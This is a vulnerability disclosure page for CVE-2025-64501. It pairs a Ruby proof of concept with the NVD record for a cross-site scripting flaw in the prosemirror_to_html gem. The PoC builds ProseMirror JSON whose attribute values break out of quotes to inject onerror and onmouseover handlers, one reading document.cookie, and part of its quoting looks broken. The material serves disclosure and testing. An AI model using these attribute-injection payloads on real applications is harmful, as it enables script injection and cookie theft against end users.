CVE-2025-64501

# ProsemirrorToHtml XSS PoC - CVE-2025-64501 # This PoC demonstrates how malicious attribute values can inject JavaScript require 'prosemirror_to_html' # Malicious ProseMirror JSON with XSS payload in attribute value malicious_doc = { type: 'doc', content: [ { type: 'paragraph', attrs: { # XSS payload in custom attribute - triggers onerror handler 'data-src' => 'xss' onerror='alert("XSS by prosemirror_to_html CVE-2025-64501")' b='' }, content: [ { type: 'text', text: 'Normal paragraph text' } ] } ] } # Another PoC variant using event handler in attribute malicious_doc2 = { type: 'doc', content: [ { type: 'heading', attrs: { # Embedding JavaScript event handler 'class' => '" onmouseover="alert(document.cookie)"' }, content: [ { type: 'text', text: 'XSS via attribute injection' } ] } ] } # Convert to HTML - vulnerable version will output unsanitized attributes html_output = ProseMirrorToHtml::HtmlRenderer.new.render(malicious_doc) puts "Generated HTML (vulnerable):" puts html_output # The output will contain the unescaped JavaScript code that browsers will execute

{"cve": {"id": "CVE-2025-64501", "sourceIdentifier": "[email protected]", "published": "2025-11-10T22:15:37.683", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "ProsemirrorToHtml is a JSON converter which takes ProseMirror-compatible JSON and outputs HTML. In versions 0.2.0 and below, the `prosemirror_to_html` gem is vulnerable to Cross-Site Scripting (XSS) attacks through malicious HTML attribute values. While tag content is properly escaped, attribute values are not, allowing attackers to inject arbitrary JavaScript code. Applications that use `prosemirror_to_html` to convert ProseMirror documents to HTML, user-generated ProseMirror content, and end users viewing the rendered HTML output are all at risk of attack. This issue is fixed in version 0.2.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/etaminstudio/prosemirror_to_html/commit/4d59f94f550bcabeec30d298791bbdd883298ad8", "source": "[email protected]"}, {"url": "https://github.com/etaminstudio/prosemirror_to_html/security/advisories/GHSA-52c5-vh7f-26fx", "source": "[email protected]"}]}}